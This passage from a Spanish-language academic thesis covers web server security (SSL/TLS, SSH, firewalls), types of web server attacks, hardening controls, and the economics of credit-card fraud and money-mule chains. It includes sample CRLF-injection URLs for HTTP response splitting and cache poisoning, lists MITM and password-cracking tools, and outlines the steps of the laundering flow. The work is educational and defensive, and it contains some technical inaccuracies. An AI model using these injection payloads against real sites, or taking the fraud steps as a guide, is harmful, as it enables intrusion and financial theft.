Weeks, Jeffrey (2010, 9 de diciembre ) Paypal Payments Disrupted by WikiLeaks Attacks, Visa and Mastercard Also Attacked . Recuperado el 7 de julio del 2011 de http://www.associatedcontent.com/article/6100832/paypal_payments_disrupted_by_wikileaks.html?cat=15
113
Entre los servicios de seguridad que se ofrecen están:
Protocolo de Encriptación SSL: SSL, por sus siglas en ingles Secure Socket
Layer o capa de conexión segura, es un protocolo de seguridad utilizado para
encriptar la data entre el sitio web y el usuario. Este certificado se instala en el
servidor y ofrece una conexión segura entre el portal o sitio y el cliente. De esta
manera cuando se hacen transacciones electrónicas donde las información
introducidas por el cliente tienen cierta sensibilidad, un protocolo de
encriptación de datos es lo ideal para que un tercero no tenga acceso a dicha
data.
Si existiera la posibilidad de que alguien intercepte la información enviada a un
sitio determinado que utiliza encriptación SSL, dicha persona no podría
entenderla, ya que la misma está codificada. El usuario puede tener la certeza
de que su información es segura cuando el sitio web presenta en su barra de
navegación un candado, que indica que ese sitio posee una encriptación SSL
(ver imagen 5.2.1.1).
114
Imagen 5.2.1.1: Encriptación SSL 3.2 128Bits / TLS 1.0
Es importante mencionar que este protocolo de encriptación SSL llegó hasta su
versión 3.0 que fue lanzada en el año 1996.
Luego fue creada lo que es el TLS, por sus siglas en ingles Transport Layer
Security o securidad de transporte de capas, que es una versión mejorada del
SSL. El mismo fue definido en el RFC 224642. Actualmente el protocolo de
seguridad TLS está en su versión 1.2 (también llamada SSL 3.3).
42
RFC se refiere a los estándares y protocolos de Internet de manera oficial. Cada RFC se refiere a un estándar o protocolo emitido por el IETF (Internet Engeenier Task Force o fuerza de ingenieros de Internet) entidad que se encarga de hacer que el Internet funcione mejor.
115
Protocolo SSH: El protocolo SSH, por sus siglas en ingles Secure Shell o
intérprete de órdenes segura, no es más que un protocolo que nos permite
conectarnos remotamente a un equipo, en este caso un servidor de forma
segura.
Normalmente cuando el cliente adquiere un servicio de hospedaje se le da
acceso a crear cuentas FTP43, y acede al servidor mediante algún programa de
FTP. Pero si el servidor no tiene instalado el protocolo SSH, cuando el cliente,
en este caso el dueño del sitio, se conecta de forma remota, la conexión hacia
su servidor no es segura y un usuario malintencionado puede ver cuál es el
usuario y la contraseña para acceder a los archivos de dicho sitio web.
Por esto el protocolo SSH viene pre-incluido al momento de adquirir los
servicios de alojamiento web. Claro que no todo es por parte del servidor,
también el cliente (dueño del sitio) debe de utilizar un programa FTP que
soporte SSH, en este caso llamado protocolo SFTP Y habilitar la conexión
utilizando el protocolo SFTP (Secure FTP) al momento de conectarse al
servidor (ver imagen 5.2.1.2).
43
Protocolo de Transferencia de Archivos (FTP): es un protocolo de red para la transferencia de archivos entre sistemas conectados a una red TCP (Transmission Control Protocol), basado en la arquitectura cliente-servidor.
116
Imagen 5.2.1.2: Ftp utilizando el protocolo SSH también llamado protocolo
SFTP.
Firewall: Existen dos tipos de Firewall, uno físico y otro a nivel de software.
Para los fines nos enfocaremos en el Firewall de Software. “Un Firewall es un
sistema diseñado para prevenir acceso no autorizado hacia o desde una red
privada o computadora”. (Sharp Colmer, M. Thomas, 2005, P174).
En otras palabras un firewall o corta fuego como comúnmente es traducido, no
es más que un programa que se utiliza para controlar el acceso tanto al
sistema desde afuera, dígase los puertos de entradas al computador, como los
117
cambios hechos dentro del mismo (cambios en el registro del sistema
operativo) realizado por otros programas. Esto evita que usuarios
malintencionados entren a tu equipo a través de la red. Y evita que programas
de tipo Malware modifiquen el registro de Windows o del sistema operativo que
se utilice y haga cambios que impidan detener posibles ataques o daños en el
sistema.
Cuando se opta por un servidor dedicado, es muy importante configurar el
firewall si viene pre-instalado con el servicio o en dado caso adquirir uno
partiendo del sistema operativo que se utilice. Existen servicios que ofrecen los
proveedores de alojamiento (hosting) como el de un especialista en servidores
web y firewalls. Debido a que cada servidor web es un mundo, existe un
experto para cada uno de ellos. Por esta razón si se tiene un servidor Windows,
el servidor web es Microsoft Forefront (antiguamente conocido como ISA
Server), en el caso de Linux seria Apache que es el más usado a nivel mundial.
Claro existen otros servidores web partiendo del sistema operativo y el servidor
web se instala el firewall.
ASSP Spam / Virus Protection: El término ASSP se refiere a Anti- Spam
SMTP Proxy, nada más que un proyecto de servidor, basado en PEARL44,
44
Es un lenguaje de programación basado en un estilo de bloques como los del lenguaje C o AWK, y fue ampliamente adoptado por su destreza en el proceso de texto y no tener ninguna de las limitaciones de los otros lenguajes de script.
118
hecho código abierto que libera numerosas metodologías y tecnologías para
capturar e identificar correos no deseados (e-mail spam)45.
Este servicio de protección antivirus es muy ofertado por las empresas que
ofrecen alojamiento, ya que es una gran herramienta para combatir los correos
no deseados, que poseen virus y los llamados phishing.
Servicios de Backup: Considerada por muchas personas como la mejor forma
de asegurar realmente los datos, ya que lamentablemente ningún sistema es
seguro, los respaldos de seguridad o backup es la única solución ante un
posible ataque y perdida de los datos.
Imagen 5.2.1: Servicios de Seguridad SSL, TSL y HTTPS que utiliza
paypal.com
45
Wikipedia.org , ASSP, recuperado el 30 de julio de 2011 de http://en.wikipedia.org/wiki/Anti-Spam_SMTP_Proxy
119
5.3 - Ataques a servidores web.
Los ataques a servidores suceden por diversas razones. Según el manual de
Certificación Etica Hacker, en su modulo 12, “Hacking Webserver”: Las razones
por la que los servidores Web son comprometidos son:
I. Falta de políticas de seguridad, procedimientos y mantenimiento
adecuado.
II. Incorrecta configuración del servidor web, el sistema operativo y la red.
III. Fallas (bugs) en programas, sistemas operativos y aplicaciones web.
IV. Instalar el servidor web con la configuración por defecto.
V. Fallas de seguridad en el software del sistema, sistema operativo y
aplicaciones sin parchear.
VI. Archivos innecesarios de respaldo, muestras y por defecto.
VII. Permisos inapropiados a archivos y directorios.
VIII. Servicios funcionando innecesariamente, incluyendo manejadores de
contenidos y administración remota.
IX. Cuentas con su configuración por defecto y su clave por defecto.
X. Funciones administrativas o de depuración que estén corriendo o son
accesibles.
XI. Certificados SSL y ajustes de encriptación mal configurados.
XII. Utilizar un certificado auto-asignado y certificados por defecto.
XIII. Autenticación inapropiada a través de sistemas externos.
Y debido a estas fallas se realizan diferentes tipos de ataques en lo servidores
web.
120
5.3.1 - Tipos de ataques
Entre los tipos de ataque a Servidores Web están:
Ataque de división de respuesta vía HTTP (HTTP Response Splitting): este
ataque consiste en agregar al cabezal (header) de una página web, un código
maligno que te permite hacerte con dicha página, lográndolo a través de un
campo de entrada. El atacante hacer creer al internauta que las informaciones
que está recibiendo del sitio que está navegando son fidedignas, cuando
realmente manipula la información que contiene el sitio.
El atacante pasa la información malévola por alguna aplicación vulnerable que
posea el sitio permitiendo introducir información en el cabezal (header) del sitio.
Para que todo esto sea posible la aplicación debe de permitir dar entrada a
datos tipo Retorno de Carro o CR (Carriage Return46) y de tipo Salto de Linea o
LF (Line Feed47). Cuando se aplica un CR con un LF utilizando “/r o %0d” para
el retorno y “/n o %0a” para el salto de pagina, se logra escribir una nueva línea
de texto, pudiendo así el atacante hacerse con el sitio burlando el servidor web.
Ejemplo:
http://icis.digitalparadox.org/~dcrab/redirect.php?page=%0d%0aContent-
Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont%20color=red%3Eh
ey%3C/fon
t%3E%3C/html%3E
46
Es uno de los caracteres de control de la codificación ASCII, Unicode, o EBCDIC, que hace que se
mueva el cursor a la primera posición de una línea. 47
es un código de control que indica un movimiento a la siguiente línea de texto
121
En este caso el código insertado es: %0d%0aContent-
Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont%20color=red%3Eh
ey%3C/fon
t%3E%3C/html%3E
Una vez el atacante es capa de introducir este código, puede tener acceso a
hacer otro tipos de taques como: XSS (Cross-Site Scripting), Page Hijack,
Desfasar al usuario (Cross-User Defacement), y envenenamiento del caché.
Ataque de envenenamiento de caché (Web Cache Poisoning): Este ataque
sea hace muy parecidamente como el ataque de división de respuesta, en este
caso el atacante logra que servidor web vacíe su contenido del caché y la
sustituya por la información que este envía.
Esto se logra utilizando el comando de control de caché o un Pragma48 en una
línea de código similar a la siguiente:
“caché-control: no caché”
“pragma: no-cache”
Esta acción le ordena al servidor web a limpiar el chaché y luego el atacante
envía la información que será guardada en el mismo. Así cuando el navegante
entre al sitio y el mismo no lo tenga guardado en caché será dirigido al nuevo
sitio, facilitando así hacer el famoso “phishing”. De esta manera es fácil para el
atacante crear un sitio fantasma y re-dirigir a los internautas al sitio falso.
48
Sentencias especiales que controlan el comportamiento del compilador, es decir son directivas de
compilador.
122
Ejemplo usando cache-control:
http://icis.digitalparadox.org/redirect.php?page=%0d%0aContent-
Type:%20text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-
Control:%20no-cache%0d%0aContent-
Type:%20text/html%0d%0a%0d%0a<html><font color=red>hey</font></html>
HTTP/1.1
Ejemplo usando pragma:
http://icis.digitalparadox.org/redirect.php?page=%0d%0aContent-
Type:%20text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma
:%20nocache%
0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html><font
color=red>hey</font></html> HTTP/1.1
Suplantación de respuesta vía HTTP (HTTP Response Hijacking): Como su
nombre lo dice, una vez que se hace la división de repuesta al servidor web, el
hacker puede interceptar las solicitudes del usuario, enviarles respuestas falsas
y hacerse con la información del usuario. Como podría darse el caso de un
portal financiero donde el usuario introduce sus credenciales de banco y quien
recibe esta información es el hacker o atacante y provee al usuario un portal
falso.
123
Ataques de fuerza bruta al protocolo SSH (SSH Bruteforce): Otra forma de
atacar a los servidores Web es a través del protocolo SSH. El atacante puede
aplicar el método de fuerza bruta para descifrar las credenciales de inicio de
sección del SSH. De esta forma se pueden enviar malware a las victima en
este caso el internauta sin que este lo detecte (ver imagen 5.3.1.1).
Imagen 5.3.1.1: Funcionamiento ataque SSH.
Ataque “hombre en el medio” (Man-in-the-middle MITM): Este ataque
permite al hacker hacer la función de proxy, siendo el puente de enlace entre el
internauta y el servidor. Utilizando diversas técnicas y programas el atacante
divide la conexión TCP en dos nuevas conexiones, una entre el usuario y el
atacante y otra entre el servidor y el atacante (ver figura 5.3.1.2).
Este tipo de ataque es sumamente eficiente debido a que el atacante recibe la
información en formato ASCII y por ende puede entender toda la data
124
transferida. Por ende es posible capturar la información en un Cookie, o
cambiar el monto de una transacción e incluso hasta la cuenta destino49.
El ataque MITM puede hacerse a un HTTPS o sea un HTTP seguro, en este
caso solo se hacen dos sesiones SSL independientes, una sobre cada
conexión TCP. Actualmente los navegadores como Google Chrome, Firefox e
IE muestran una advertencia sobre este posible ataque, indicando que al sitio
que estas siendo dirigido no es el que supuestamente debes de ir o que
puedes estar siendo víctima de un “phishing” (ver imagen 5.3.1.3).
Entre las herramientas necesarias para lograr este ataque MITM se pueden
mencionar:
I. PacketCreator
II. Ettercap
III. Dsniff
IV. Cain e Abel
Para hacerse con el control de la conexión y hacer la función de Proxy, también
llamado MITM Proxy, se pueden listar las siguientes herramientas:
I. OWASP WebScarab
II. Paros Proxy
III. Burp Proxy
IV. ProxyFuzz
V. Odysseus Proxy
49
Man-In-The-Middle Attack, Owasp.org, recuperado el 31 de Julio del 2011, de https://www.owasp.org/index.php/Man-in-the-middle_attack ,
125
VI. Fiddler (by Microsoft)
Figura 5.3.1.2: Ataque MITM
Descifrar la clave del Servidor Web (Webserver Password Cracking): Uno
de los métodos más comunes de ataques es romper la clave al servidor, el
atacante trata de probarle al servidor web que es un usuario valido. Utilizando
ingeniería social, Spoofing, Phishing, virus troyanos, entre otros métodos, el
atacante busca la forma de atacar ya sea autenticarse a través de los
formularios web, o los túneles SSH, servidores FTP, servidores de correo
SMPT, utilizando 4 tipos de ataques:
I. Adivinando: Que es la forma más común utilizada por los atacantes,
regularmente cuando se hacen ingeniería social, el hacker deduce cual
es la clave.
126
II. Ataques usando diccionarios: utilizando programas como “Cain And
Abel” utilizando un diccionario de palabras, si la clave del usuario es muy
fácil, se puede encontrar la contraseña rápidamente.
III. Ataque Hibrido: El ataque hibrido aparte de palabras incluye números,
caracteres y símbolos al la búsqueda de la clave. Este método se toma
más tiempo que un simple ataque de diccionario de palabras.
IV. Ataque de fuerza bruta: Este es el más largo de los ataques, se puede
tomar un largo tiempo descifrar la clave, ya que esta prueba cada
combinación existente hasta dar con la clave.
Imagen 5.3.1.3: Advertencia de Phishing
5.4 - Controles.
Dadas las principales razones por el cual los servidores web son
comprometidos se pueden adoptar medidas y controles preventivas.
127
Controles sobre actualizaciones y parches de seguridad:
I. Buscar vulnerabilidades existentes los sistemas operativos y servidores
web. Actualizar los mismos frecuentemente. Antes de aplicar dichas
actualizaciones o parches de seguridad es importante leer todas las
documentaciones.
II. Cuando se instalen las actualizaciones y parches, se deben de hacer
basándose en necesidades. Una vez instalados se debe de probar
dichas actualizaciones en un ambiente de prueba, antes de ser utilizado
de manera regular en el servidor. Así se evitan inconvenientes de
compatibilidad y otros posibles problemas.
III. Dichas actualizaciones y parches deben de ser instalados en todos los
controladores de dominios (DCs). Se debe asegurar que el servidor
tenga en agenda instalar dichas actualizaciones, hacer sus respectivos
respaldos (backups) y los discos de reparación de sistemas estén
disponibles.
IV. Siempre tener un plan de respaldo (backup) en caso de que la
implementación falle. Se debe procurar no estar muy atrasados con los
parches y paquete de servicios (service pack).
Controles sobre los protocolos:
I. Se debe bloquear todos los puertos que no se usen, el tráfico del
protocolo de mensajes de control de Internet (ICMP50) y todos los
protocolos innecesarios como NetBIOS51 y SMB52.
50
Es el sub protocolo de control y notificación de errores del Protocolo de Internet (IP) y se usa para enviar mensajes de error, indicando por ejemplo que un servicio determinado no está disponible o que un router o host no puede ser localizado
128
II. Hacer más rigurosa las pilas (stack) TCP/IP, o sea los controles que
manejan la comunicación entre el servidor de Internet.
III. En caso de utilizar protocolos inseguros como Telnet, POP3, SMTP,
FTP, se debe de implementar medidas de para asegurar la autenticación
de la comunicación utilizando, por ejemplo, políticas IPSec (protocolo de
seguridad de Internet).
IV. Cuando se utilicen conexiones de acceso remoto, se debe procurar
utilizar protocolos de encriptación de túneles.
V. Deshabilitar el WebDAV53 sino se está utilizando por alguna aplicación.
Controles sobre las cuentas:
I. Se deben de remover todos los protocolos y extensiones de aplicaciones
que no se usen.
II. Deshabilitar las cuentas de usuarios por defectos que se crean cuando
se instala el sistema operativo.
III. Cuando se crean directorios web nuevos, se deben de dar los permisos
NTFS necesarios (los menos posibles) al usuario anónimo que utiliza el
servidor web IIS para acceder al contenido web.
IV. Se deben de eliminar los usuarios innecesarios en la base de datos y
dar la menor cantidad de permisos a las aplicaciones para evitar el
envenenamiento de las solicitudes SQL.
51
Por sus siglas en ingles Network Basic Input/Output System o NetBIOS, es una especificación de interfaz para acceso a servicios de red, es decir, una capa de software desarrollado para enlazar un sistema operativo de red con un hardware específico. 52
Por sus sigals en ingles Server Message Block o SMB es un Protocolo de red que permite compartir archivos e impresoras (entre otras cosas) entre nodos de una red. 53
Es un protocolo que proporciona funcionalidades para crear, cambiar y mover documentos en un servidor remoto.
129
V. Utilizar permisos Web y NTFS seguros. También mecanismos de control
de acceso a la estructura de trabajo de .NET incluyendo autorizaciones
de URL.
VI. Se debe procurar que los ataques de fuerza bruta sean más
complicados aplicando políticas de contraseñas complicadas. Obligando
al usuario que su contraseña contenga caracteres, mayúsculas,
números y símbolos. Y no solo eso, también se debe de auditar y alertar
sobre inicios de sección equívocos.
VII. Al momento de ejecutar procesos, lo ideal es que se utilice cuentas con
la menor cantidad de privilegios posibles.
Controles sobre los archivos y directorios:
I. Se deben de eliminar archivos innecesarios dentro de los archivos .jar
II. Se debe evitar el mapeado de virtual de directorios entre diferentes
servidores o redes.
III. Se debe de monitorear contantemente las bitácoras (logs) de los
servicios de red, de los accesos al sitio web, como también los de la
base de datos y del sistema operativo.
IV. Deshabilitar la lista de directorios
V. se debe procurar tener los archivos instalación de aplicaciones web y
scripts en directorios diferentes a donde se encuentra instalado el
sistema operativo, dígase, se deben de tener en otra partición del disco.
130
5.5 – Impactos.
El recibir ataques a los servidores web puede tener varios impactos, tanto
organizacionales como técnicos.
Anteriormente se mencionó el ataque hecho por el grupo de hackers LulzSec a
la red de Play Station de Sony, y su impacto fue devastador tanto para la
empresa como para sus usuarios. Muchos de ellos perdió la confianza en dicha
empresa al igual que muchos otros nuevos temen al momento de ingresas su
datos personales y crediticios dentro de la plataforma del Play Station Network.
Claro esta información no es divulgada ya que empresas de ese calibre no se
pueden dar el lujo de permitir que este tipo de información circule.
Pero es normal como seres humanos, temer ante este tipo de ataques que
ponen a disposición nuestra información de tarjetas de créditos a usuarios
malintencionados.
Según la CEH (ética hacker certificado) los principales impactos de los ataques
a servidores web (ver imagen 5.5.1) son:
I. Se comprometen los datos de los usuarios: Cuando los datos del
usuario son comprometidos y publicados como sucede en múltiples
ocasiones, la organización pierde credibilidad sobre su compromiso de
salvaguardar la información de sus usuarios. Algo que puede provocar
temor y abandono por parte de sus usuarios/clientes.
131
II. Se manipulan los datos: este es un impacto técnico que puede traer
consecuencias graves a la organización debido a que tanto el usuario
como la misma empresa puede verse afectada por poseer datos
incorrectos.
III. Ataques secundarios al sitio web: Una vez se ha hecho algún tipo de
ataque (como el de división de respuestas HTTP) el sitio web se vuelve
vulnerable a otros ataques.
IV. Desfiguración del sitio web: Cuando un hacker se hace con un Sitio
Web, puede cambiar su apariencia y publicar una versión propia con
informaciones (por lo regular obscenas) reclamando que este sitio ha
sido violentado por él. Lo que puede crear temor entre sus usuarios.
V. Robo de datos: El robo de datos tiene un impacto organizacional muy
grande, ya que como en el caso de la red de Play Station, las cuenta de
más de 250 mil usuario quedo comprometida, aunque el atacante dice
que fueron 1 millón. Esto trae como consecuencia una baja en la
productividad monetaria de la empresa ya que los usuarios buscarían
otras formas de adquirir los juegos y no por esta vía o simplemente
cambian de consola. Al final la empresa pierde credibilidad y dinero.
VI. Acceso raíz a otras aplicaciones y servidores: Una vez un hacker
penetra un sistema y el servidor es compartido, es posible que se
puedan comprometer todas las cuentas de los clientes de dicho servidor,
sus sitios web como las informaciones de los usuarios. Esto se logra
comúnmente haciendo el ataque de inyección SQL (SQL Inyection).
132
Imagen 5.5.1: Impacto Ataques Servidores Web
5.6 - Mitigando los riesgos.
La mejor forma de mitigar riesgos es previniendo. Y la mejor forma de prevenir
ataques en los servidores Web es aplicando los controles anteriormente
señalados. Existen otras medidas que se pueden tomar para mitigar los riesgos
de ser atacados entre ellos:
I. Limitar el tráfico entrando al puerto 80 para HTTP y el puerto 443 para
HTTPS (SSL).
II. Encriptar o restringir el tráfico a Internet.
III. Asegurarse que el rastreo del sitio esté deshabilitado utilizando la
siguiente línea de código: <trace enable = “false”/>. Y apagar los
compiladores de depuración.
133
IV. Implementar en el sitio Web código seguro. Utilizando las guías que
ofrece la W3C para los fines.
V. Restringir las políticas de acceso de los códigos, para asegurar que los
códigos bajados de Internet no tengan permisos para ejecutarse.
VI. Configurar el IIS (si el sistema operativo es Windows) para que no
permita URL con “…/”, y evitar que se pueda acceder a directorios del
servidor sin permiso, así como a comando del sistema y utilidades, esto
se logra restringiendo la lista de control de acceso (ACLs).
VII. En un servidor IIS de Windows, se puede utilizar la herramienta
ISSLockdown, cuya función es reducir las vulnerabilidades de Windows
2000 Web Server. Permitiéndote utilizar un rol específico de servidor y
elegir plantillas personalizables para dicho servidor.
VIII. Remover los filtros ISAPI54 del servidor web que no sean necesarios.
IX. Restringir el retorno de información de los banners vía IIS.
X. Utilizar del lado del servidor un rastreador de identificación de sección y
compara las conexiones con las direcciones IP, el tiempo de conexión,
lugar, entre otros.
XI. No se debe permitir que haga inicio de sección localmente en el
servidor, al menos que sea el administrador.
XII. No se debe conectar el Servidor Web, hasta que este no sea
personalizado y aplicado las políticas y controles que refuercen su
seguridad.
54
Es una interfaz, de programación de aplicaciones (API), que permite que los programadores puedan desarrollar aplicaciones basadas en web que se procesen mucho más rápidamente.
134
CAPÍTULO VI:
FRAUDES CIBERNÉTICOS
135
CAPÍTULO VI: FRAUDES CIBERNÉTICOS
Es necesario aclarar que un fraude cibernético no solo toma lugar en el
Internet, aunque es complejo porque incluye también los fraudes electrónicos.
Según la enciclopedia en línea Wikipedia.org, el término fraude cibernético se
refiere a cuando inducimos a una segunda persona o varias personas a hacer o
restringirse en lograr hacer alguna cosa de la cual el criminal saldría
beneficiado por lo tanto:
Alterar el ingreso de datos de manera ilegal. Esto requiere que el criminal
posea un alto nivel de técnica y por lo mismo es común en empleados de una
empresa que conocen bien las redes de información de la misma y pueden
ingresar a ella para alterar datos como generar información falsa que los
beneficie, crear instrucciones y procesos no autorizados o dañar los sistemas.
Entre las acciones que se pueden a realizar están:
1. Alterar, destruir, suprimir o robar datos, un evento que puede ser difícil
de detectar.
2. Alterar o borrar archivos.
3. Alterar o dar un mal uso a sistemas o software, alterar o reescribir
códigos con propósitos fraudulentos. Estos eventos requieren de un alto
nivel de conocimiento.
Otras formas de fraude informático incluye la utilización de sistemas de
computadoras para robar bancos, realizar extorsiones o robar información
clasificada55.
55
Wikipedia.org, Delito Informatico, recuperado el 17 de Julio del 2011 de http://es.wikipedia.org/wiki/Delito_inform%C3%A1tico
136
6.1 - Modelo económico.
La delincuencia cibernética en el sector financiero ha aumentado de manera
exponencial en los últimos 4 años, formando la base de una tendencia que al
parecer no muestra señales de poder disminuir. La delincuencia cibernética ha
evolucionado desde una molestia menor a una preocupación importante con la
participación de actores bien organizados y organizaciones altamente
sofisticadas. Lo que comenzó con un total de 419 estafas de phishing
rudimentarias, se ha convertido en una economía subterránea de alta
complejidad generando herramientas de software de calidad profesional, los
negocios legítimos que proporcionan protección a delincuentes cibernéticos,
sofisticados sistemas de manipulación de acciones, y, lo más revelador, un
sentido de comunidad entre los criminales. El total de las ganancias que
generan los delitos cibernéticos es imposible estimar con precisión, pero la
mayoría indican que está en las decenas de millones de dólares, tal vez en los
cientos.
Las razones de este asombroso crecimiento en el fraude cibernético son
sencillas. En primer lugar, la población total de usuarios de Internet continúa
creciendo, el fraude cibernético encubierto acumula incentivos para los
participantes con el fin de diversificar sus actividades, dándole forma a un
mercado con una división funcional de labores. Esta especialización a su vez,
permite a los expertos evolucionar y pasar sus productos y conocimientos a los
demás, disminuyendo el tiempo de aprendizaje de los nuevos
entrantes. Veteranos establecidos en la "escena" asesoran a los recién
llegados y crean relaciones de forma tal que al final se convierten en
asociaciones de criminales cibernéticos.
137
En algunas áreas, estos grupos asumen el carácter de puntos flojos y cada vez
más clásicos sindicatos del crimen organizado optan por la coexistencia de
grupos de la delincuencia cibernética, una protección para ellos, o desarrollar
sus propias capacidades internas. Debido a que los Ciber delincuentes
encontraron el éxito fácil en sus objetivos como son los consumidores y los
bancos minoristas, que, hasta hace muy poco, han tenido pocos incentivos
para ampliar sus actividades, pero en la actualidad esto está
cambiando. Siguen ganando popularidad la manipulación de las acciones a
través de cuentas bancarias lo que indica que los estafadores más
competentes son cada vez más capaces y conocedores. Otros encuentran las
formas de "cobrar" las cuentas que previamente habría sido demasiado grande
de usar una vez robada. Como resultado, las cuentas de retiro y de jubilación
son las favoritas en el mundo del fraude.
6.2 - Los roles del Ciber Fraude
Al igual que cualquier otro mercado, el negocio de las tarjetas de créditos (ver
imagen 6.2.1) consiste en una cierta entrada de recursos, en este caso, las
credenciales de las cuenta que se extraen y se procesan por los proveedores,
por lo general los Phishers, son lanzadas al mercado y vendidas al por menor
por intermediarios y finalmente compradas y consumidas en el mundo de las
demandas por los usuarios que obtienen las tarjetas.
También se muestra en la Figura 6.2.1, las categorías económicas de
los mayoristas, minoristas, y contratistas independientes que ofrecen servicios
138
especializados para crear un valor adicional. De hecho, la única salida seria de
este modelo a partir de los modelos económicos tradicionales es el hecho de
que el riesgo de incurrir a través de la posesión o la transmisión de los datos
que se adquirieron de manera ilegal es una omnipresente fuente de valor.
El modelo explica el proceso por el cual los delincuentes en estas
actividades roban los credenciales de las cuenta que luego refinen y
mercadean los datos en paquetes a un formato mas entendible para "el usuario
final " que al finalmente pueda ver antes de comprar o adquirir el producto
vendido. Paso a paso, el proceso se desarrolla de la siguiente manera:
Imagen 6.2.1: Funcionamiento del ciber fraude
1. Phishers, estafadores o hackers atacan las base de datos de las
instituciones financieras o su clientela para lograr obtener credenciales
de algunas cuentas. A veces, los atacantes utilizan los servicios de
139
agentes externos que no han adquirido directamente los datos robados,
sino que facilitan su adquisición a través del diseño de las páginas con
phishing o la provisión de herramientas a través del cual otros puedan
entrar de forma ilegal en los sistemas donde se encuentran
almacenados estos credenciales.
2. El que la adquiere luego contrata a alguien con experiencia
mercadeando estos datos. A veces, el comprador es el vendedor en el
mercado, pero aún así debe obtener verificación como distribuidor
honesto de los dueños de estos distribuidores en la comunidad. En otras
ocasiones, el comprador vende sus datos a granel a intermediarios que
llegan a ser los actores principales en el mercado ilícito.
3. Los vendedores en este mercado venden informaciones calificadas a los
"consumidores de cuenta" quienes puedan llegar a necesitar ayuda
adicional de una mula, para convertir dicha información en un activo.
4. Al hacerlo, el consumidor convierte estas mercancías en moneda de
la economía legítima.
6.3 - Técnicas.
El modelo que se muestra en la Imagen 6.3.1 "descomprime" la forma como se
suple en el mercado estos credenciales. Los cuadros de la izquierda
constituyen una lista bastante completa de los métodos a través del cual los
140
vendedores y sus agentes roban las credenciales. Por supuesto, cada
elemento de la taxonomía o bien cae en la categoría de spam o de
redirección. Los estafadores luego recogen la información ya sea a través de
troyanos o de los sitios con phishing, con keyloggers o de aplicaciones
personalizadas para llegar a instituciones específica. La secuencia de los
bloques a la derecha muestra la ubicación de las credenciales obtenidas con la
forma antes mencionada.
Imagen 6.3.1: Técnicas de adquisición de cuentas y proveedores de servicio
(fuente: VeriSign iDefense, 2007)
141
Secuencia del proceso de adquisición de cuentas:
I. El estafador contrata de un mercader para realizar la
transacción financiera. El mercader o el comerciante recibe la credencial
de la cuenta robada, la información de los autores del fraude de la
cuenta, e instrucciones sobre la cantidad a transferir.
II. El mercader utiliza la cuenta robada para realizar una
transacción financiera con la cuenta del banco para adquirir bienes a
través de un minorista.
III. El banco transfiere los fondos a la cuenta de la mula, suministrado por el
mercader, o el distribuidor envía la mercancía a la dirección
del revendedor, lo que puede ser nada más que un sitio de descenso.
IV. La mula luego transfiere fondos a la cuenta del mercader o de otra
mula para ocultar aún más la cadena de transacciones. Cuando se trate
de mercancías, el revendedor envía la mercancía a otra
dirección, posiblemente la de otro revendedor.
V. El mercader luego entrega los fondos de los autores del fraude,
manteniendo una cierta parte como compensación por su servicio (ver
imagen 6.3.2).
142
Imagen 6.3.2: Proceso en Flujo del dinero. (Fuente: VeriSign iDefense, 2007.)
Según Rick Howard en su libro Cyber Frauds: “En los últimos años, el fraude
en línea de las tarjetas de crédito (o "carding") ha tenido un impacto
significativo. En 2003 y 2004, la mayoría de las comunicaciones en
línea relacionada con las tarjetas se incremento”. Existen foros de acceso
público relacionados al tema, pero varios de alto perfil operacional, uno que se
dio a notar fue la "Operación Firewall" a finales de 2004 que se llevo de forma
clandestina en alguna sala oscura del Internet Relay Chat (IRC) servicio de
mensajería instantánea o mensajes privados.
Proceso de reventa de con cuentas robadas:
143
1. "El Estafador" contrata a un revendedor para realizar una transacción en
compras. El "Revendedor" recibe los credenciales de la cuenta robada y
las instrucciones con respecto a los productos deseados y la información
de envío.
2. "El Revendedor" usa la cuenta robada para realizar una transacción en
compras a algún comerciante.
3. "El Comerciante" (un comercio legitimo en este caso) entrega a la
dirección suministrada por el revendedor. Esta dirección es ocupada por
una "Mula".
4. "El Revendedor" recoge el producto donde la "Mula".
5. "El Revendedor" entrega luego al "Estafador", manteniendo cierto
porcentaje como compensación por el servicio (ver imagen 6.3.3).
Imagen 6.3.3: Proceso de Reventa.
144
Proceso de transacciones con rutas de mula:
1. "El Estafador" contrata al "Revendedor" para realizar alguna
transacción financiera. El "Revendedor" recibe los credenciales
de la cuenta robada y las instrucciones con respecto a la cantidad
deseada y la información de la cuenta del "Estafador"
2. "El Revendedor" usa la cuenta robara para realizar una
transacción financiera con la cuenta del banco.
3. "El banco" transfiere los fondo de las cuenta del "Revendedor".
Esta cuenta pertenece a la "Mula", una persona legitima siendo
estafada para reenviar los fondos a la cuenta del "Revendedor".
4. "La Mula" transfiere los fondos a la cuenta del "Revendedor" o a
otra mula para ocultar mas la cadena de las transacciones.
5. "El Revendedor" entrega los fondos al "Estafador", manteniendo
cierto porcentaje por compensación al servicio (ver imagen
6.3.4).
145
Imagen 6.3.4: Rutas de la mula.
6.4 - Impactos al negocio.
Un impacto a un negocio o empresa no solo se enfoca en sus infraestructura,
en materia de ataques informáticos se inclina la prioridad de seguridad a los
datos, ya que, para cualquier empresa su activo más valioso son los datos.
a correcta Gestión de la Seguridad de la Información busca establecer y
mantener programas, controles y políticas, que tengan como finalidad
conservar la confidencialidad, integridad y disponibilidad de la información, si
alguna de estas características falla no estamos ante nada seguro. Es preciso
anotar, además, que la seguridad no es ningún hito, es más bien un proceso
continuo que hay que gestionar conociendo siempre las vulnerabilidades y las
amenazas que se ciñen sobre cualquier información, teniendo siempre en
cuenta las causas de riesgo y la probabilidad de que ocurran, así como el
146
impacto que puede tener. Una vez conocidos todos estos puntos, y nunca
antes, deberán tomarse las medidas de seguridad oportunas56.
6.5 - Reputación empresarial.
Aunque la reputación empresarial es un vocablo que se utiliza ampliamente en
la práctica para hacer referencia a la imagen que una empresa pueda tener
ante la sociedad, cuando se intenta profundizar en su delimitación conceptual,
las dificultades que encuentra el analista son importantes.
Por un lado, nos enfrentamos a un fenómeno de naturaleza intangible, es decir,
ante un elemento que no tiene una esencia física, sino que está basado en la
información y el conocimiento y , por tanto, no se puede identificar con
precisión. Esta característica implica relevantes condicionantes respecto a su
